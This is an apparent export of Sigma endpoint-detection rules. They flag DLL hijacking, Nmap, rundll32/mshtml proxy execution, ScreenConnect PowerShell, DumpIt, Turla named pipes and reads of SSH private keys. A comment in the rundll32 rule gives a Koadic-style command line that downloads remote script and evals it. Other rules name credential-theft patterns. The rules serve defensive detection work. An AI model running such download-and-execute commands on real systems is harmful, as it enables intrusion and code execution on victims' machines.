"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098678Z",
"creation_date": "2026-03-23T11:45:34.098680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098684Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/toddycat-keep-calm-and-check-logs/110696/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cyuserserver.yml",
"content": "title: DLL Hijacking via cyuserserver.exe\nid: e45f88d6-d02f-42b9-b7f4-e484d0347052\ndescription: |\n Detects potential Windows DLL Hijacking via cyuserserver.exe related to Cortex XDR.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securelist.com/toddycat-keep-calm-and-check-logs/110696/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/12/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cyuserserver.exe'\n ImageLoaded|endswith: '\\ntnativeapi.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n - '?:\\Windows\\System32\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature|contains: 'Palo Alto Networks'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e45f88d6-d02f-42b9-b7f4-e484d0347052",
"rule_name": "DLL Hijacking via cyuserserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cyuserserver.exe related to Cortex XDR.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-12-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e47d7b4f-fc00-4688-b543-7d7ebf22b22e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 3,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 1,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.533467Z",
"creation_date": "2026-03-23T11:45:35.294634Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294638Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1046_nmap_linux.yml",
"content": "title: Nmap Execution (Linux)\nid: e47d7b4f-fc00-4688-b543-7d7ebf22b22e\ndescription: |\n Detects the execution of nmap.\n Nmap is a tool often used by attackers to map networks, services or open ports.\n It is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/07/01\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Nmap\n - classification.Linux.Behavior.NetworkScan\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/nmap'\n\n exclusion_rapid7:\n Image:\n - '/opt/rapid7/nexpose/nse/nmap/nmap'\n - '/opt/insightvm/nexpose/nse/nmap/nmap'\n - '/data/rapid7/nexpose/nse/nmap/nmap'\n\n exclusion_opmanager:\n Image: '/OpManager/Nmap/nmap'\n\n exclusion_lynis:\n ParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_zabbix:\n - ParentCommandLine: '/bin/bash /etc/zabbix/scan_*.sh'\n - GrandparentCommandLine: '/bin/bash /etc/zabbix/scan_*.sh'\n - Ancestors|endswith: '|/usr/sbin/zabbix_agent?|/usr/lib/systemd/systemd'\n\n exclusion_version:\n CommandLine|endswith:\n - 'nmap -V'\n - 'nmap --version'\n\n exclusion_scheduled_scan:\n Ancestors|contains: '/usr/sbin/cron'\n\n exclusion_redhat_insight_client:\n ProcessGrandparentCommandLine|contains: 'insights_client/run.py'\n\n exclusion_java:\n ProcessGrandparentImage: '/usr/lib/jvm/java-?-openjdk-amd64/jre/bin/java'\n\n exclusion_cfengine:\n Ancestors|contains: '|/usr/sbin/centengine|'\n\n exclusion_cyberwatch:\n CurrentDirectory: '/home/cyberwatch/'\n Ancestors|contains: '/usr/sbin/sshd|/usr/bin/bash|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_tanium:\n ParentImage: '/opt/Tanium/TaniumClient/TaniumCX'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e47d7b4f-fc00-4688-b543-7d7ebf22b22e",
"rule_name": "Nmap Execution (Linux)",
"rule_description": "Detects the execution of nmap.\nNmap is a tool often used by attackers to map networks, services or open ports.\nIt is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e4b1a453-f5d9-465a-ad14-912517214255",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086555Z",
"creation_date": "2026-03-23T11:45:34.086557Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086561Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/",
"https://lolbas-project.github.io/lolbas/Binaries/Rundll32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_jscript_rundll32_mshtml.yml",
"content": "title: Proxy Execution of JScript via mshtml and RunDLL32\nid: e4b1a453-f5d9-465a-ad14-912517214255\ndescription: |\n Detects a suspicious invocation of mshtml by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\n It is recommended to analyze the executed script as well as child processing stemming from RunDLL32 to look for further malicious actions or contents.\nreferences:\n - https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/\n - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2021/02/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - attack.execution\n - attack.t1059.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshtml\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe javascript:\"\\..\\mshtml.dll,RunHTMLApplication \";eval(\"w=new%20ActiveXObject(\\\"WScript.Shell\\\");w.run(\\\"calc\\\");window.close()\");\n # rundll32.exe javascript:\"\\..\\mshtml, RunHTMLApplication \";x=new%20ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://xxx.xxx.xxx.xxx:9997/fqwwj\",false);x.send();eval(x.responseText);window.close(); (Koadic)\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_2:\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e4b1a453-f5d9-465a-ad14-912517214255",
"rule_name": "Proxy Execution of JScript via mshtml and RunDLL32",
"rule_description": "Detects a suspicious invocation of mshtml by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.\nIt is recommended to analyze the executed script as well as child processing stemming from RunDLL32 to look for further malicious actions or contents.\n",
"rule_creation_date": "2021-02-08",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.007",
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e4e89d8e-37ed-4481-b3e3-e2693f5cf335",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603391Z",
"creation_date": "2026-03-23T11:45:34.603395Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603402Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
"https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/",
"https://attack.mitre.org/techniques/T1219/002/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1219_002_screenconnect_command_via_powershell.yml",
"content": "title: PowerShell Command Executed via ScreenConnect\nid: e4e89d8e-37ed-4481-b3e3-e2693f5cf335\ndescription: |\n Detects a command execution through ScreenConnect, a legitimate remote access tool.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate this command to determine its legitimacy.\nreferences:\n - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n - https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/\n - https://attack.mitre.org/techniques/T1219/002/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2023/11/10\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\TEMP\\ScreenConnect\\\\*run.ps1'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e4e89d8e-37ed-4481-b3e3-e2693f5cf335",
"rule_name": "PowerShell Command Executed via ScreenConnect",
"rule_description": "Detects a command execution through ScreenConnect, a legitimate remote access tool.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate this command to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e51573be-62c7-442a-a91e-13e5a160db5e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627932Z",
"creation_date": "2026-03-23T11:45:34.627934Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_dumpit_renamed_executed.yml",
"content": "title: Renamed DumpIt Executed\nid: e51573be-62c7-442a-a91e-13e5a160db5e\ndescription: |\n Detects the execution of a renamed DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\n Attackers can use it to extract authentication secrets from memory and perform lateral movement within a network.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\nreferences:\n - https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary\n - https://attack.mitre.org/techniques/T1003/\ndate: 2025/11/21\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.DumpIt\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'DumpIt.exe'\n\n # This is handled by the rule 59a2da9a-8334-4169-8886-427fec2a7c46\n filter_name:\n Name|contains: 'dumpit'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e51573be-62c7-442a-a91e-13e5a160db5e",
"rule_name": "Renamed DumpIt Executed",
"rule_description": "Detects the execution of a renamed DumpIt binary, a tool used to create full memory dumps for forensic or diagnostic purposes on Windows systems.\nAttackers can use it to extract authentication secrets from memory and perform lateral movement within a network.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\n",
"rule_creation_date": "2025-11-21",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e521ae35-46cb-41be-8caf-a9a475264dad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609127Z",
"creation_date": "2026-03-23T11:45:34.609131Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609138Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf",
"https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_turla_named_pipe_created.yml",
"content": "title: Named Pipe Created linked to Turla\nid: e521ae35-46cb-41be-8caf-a9a475264dad\ndescription: |\n Detects the creation of a Named Pipe pertaining to the Turla attacker group.\n The Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\n It is recommended to monitor for any new lateralization alerts.\nreferences:\n - https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf\n - https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/07/11\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.Turla\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\sdlrpc'\n - '\\comnap'\n - '\\iehelper'\n - '\\userpipe'\n - '\\atctl'\n\n condition: selection\nlevel: high\n#level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e521ae35-46cb-41be-8caf-a9a475264dad",
"rule_name": "Named Pipe Created linked to Turla",
"rule_description": "Detects the creation of a Named Pipe pertaining to the Turla attacker group.\nThe Turla threat group has used specific named pipes for C2 communications and lateral movement within compromised networks.\nIt is recommended to monitor for any new lateralization alerts.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e5ceb02d-7761-4857-9490-099154c63e43",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612615Z",
"creation_date": "2026-03-23T11:45:34.612618Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612626Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/004/",
"https://attack.mitre.org/techniques/T1021/004/"
],
"name": "t1021_004_ssh_private_key_read.yml",
"content": "title: SSH Private Key Read\nid: e5ceb02d-7761-4857-9490-099154c63e43\ndescription: |\n Detects an attempt to read the content of an SSH private key.\n The private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\n An attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\n It is recommended to analyze the process responsible for reading the SSH private key and to determine if it is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1552/004/\n - https://attack.mitre.org/techniques/T1021/004/\ndate: 2022/11/07\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.004\n - attack.lateral_movement\n - attack.t1021.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path:\n - '/home/*/.ssh/id_*'\n - '/root/.ssh/id_*'\n ProcessImage|contains: '?'\n - TargetPath:\n - '/home/*/.ssh/id_*'\n - '/root/.ssh/id_*'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n filter_pub_key:\n - Path|endswith: '.pub'\n - TargetPath|endswith: '.pub'\n\n exclusion_ssh:\n - ProcessImage:\n - '/usr/bin/ssh'\n - '/gnu/store/*/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n exclusion_ssh_add:\n ProcessImage: '/usr/bin/ssh-add'\n exclusion_ssh_keygen:\n ProcessImage: '/usr/bin/ssh-keygen'\n exclusion_ssh_copy:\n ProcessCommandLine|contains: 'sh /usr/bin/ssh-copy-id '\n exclusion_gnome_keyring:\n ProcessImage: '/usr/bin/gnome-keyring-daemon'\n exclusion_seahorse:\n ProcessImage: '/usr/bin/seahorse'\n exclusion_eset:\n ProcessImage|startswith: '/opt/eset/'\n exclusion_remmina:\n ProcessImage: '/usr/bin/remmina'\n ProcessParentCommandLine: 'bash /usr/bin/remmina-file-wrapper'\n exclusion_clamav:\n ProcessImage: '/usr/bin/clamscan'\n exclusion_zabbix:\n ProcessImage: '/usr/sbin/zabbix_server'\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n exclusion_kdeinit:\n ProcessImage: '/usr/bin/kdeinit5'\n exclusion_dsagent:\n ProcessImage: '/opt/ds_agent/ds_am'\n ProcessGrandparentImage: '/usr/lib/systemd/systemd'\n\n exclusion_xdg_gnome:\n ProcessImage: '/usr/libexec/xdg-desktop-portal-gnome'\n ProcessParentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n\n exclusion_gapplication_service:\n ProcessCommandLine|contains: '--gapplication-service'\n ProcessImage:\n - '/usr/bin/nautilus'\n - '/usr/bin/gedit'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_kde_kioslave:\n ProcessImage: '/usr/lib/x86_64-linux-gnu/libexec/kf5/kioslave5'\n\n exclusion_ansible_connection:\n # /usr/bin/python3 /usr/local/bin/ansible-connection 1663518 4d9a5512-5360-d1ac-3a5c-00000000005b\n ProcessCommandLine: '/usr/bin/python3 /usr/local/bin/ansible-connection ??????? ????????-????-????-????-????????????'\n\n exclusion_proxmox:\n ProcessImage: '/usr/bin/proxmox-backup-client'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n - '/opt/tanium/taniumclient/taniumclient '\n\n exclusion_ibm_aspera:\n ProcessImage: '/opt/aspera/orchestrator-*/vendor/ruby/bin/ruby'\n\n exclusion_legitimate_process:\n - ProcessImage:\n - '/opt/qradar/ca/bin/si-qradarca'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/libexec/xdg-document-portal'\n - '/kaniko/executor'\n - '/opt/ds_agent/ds_am'\n - '/usr/bin/remmina'\n - '/opt/omni/lbin/vbda'\n - '/usr/local/cellar/openssh/*/bin/ssh'\n - '/usr/bin/keepassxc'\n - '/usr/libexec/gcr-ssh-agent'\n - '/usr/sbin/veeamagent'\n - '/usr/bin/rsync'\n - '/usr/bin/git'\n - '/gnu/store/*/bin/git'\n - '/usr/bin/fzsftp'\n - '/usr/bin/lsattr'\n - '/usr/bin/file'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/fzputtygen'\n - '/opt/endpoint-agent/agent' # sekoia agent\n - '/usr/libexec/openssh/sftp-server'\n - '/opt/podman/bin/krunkit'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/usr/bin/tar'\n - ProcessCommandLine:\n - 'airflow worker -- localexecutor'\n - '/opt/airflow/bin/celery -A airflow.executors.*'\n - '[celeryd: celery@*:ForkPoolWorker-*]'\n - '/opt/qradar/ca/bin/si-qradarca monitor -debug'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/libexec/xdg-document-portal'\n - 'puma * (tcp://0.0.0.0:8888) [/]'\n - 'java -dtalend.component.manager.m2.repository=*'\n - 'ruby 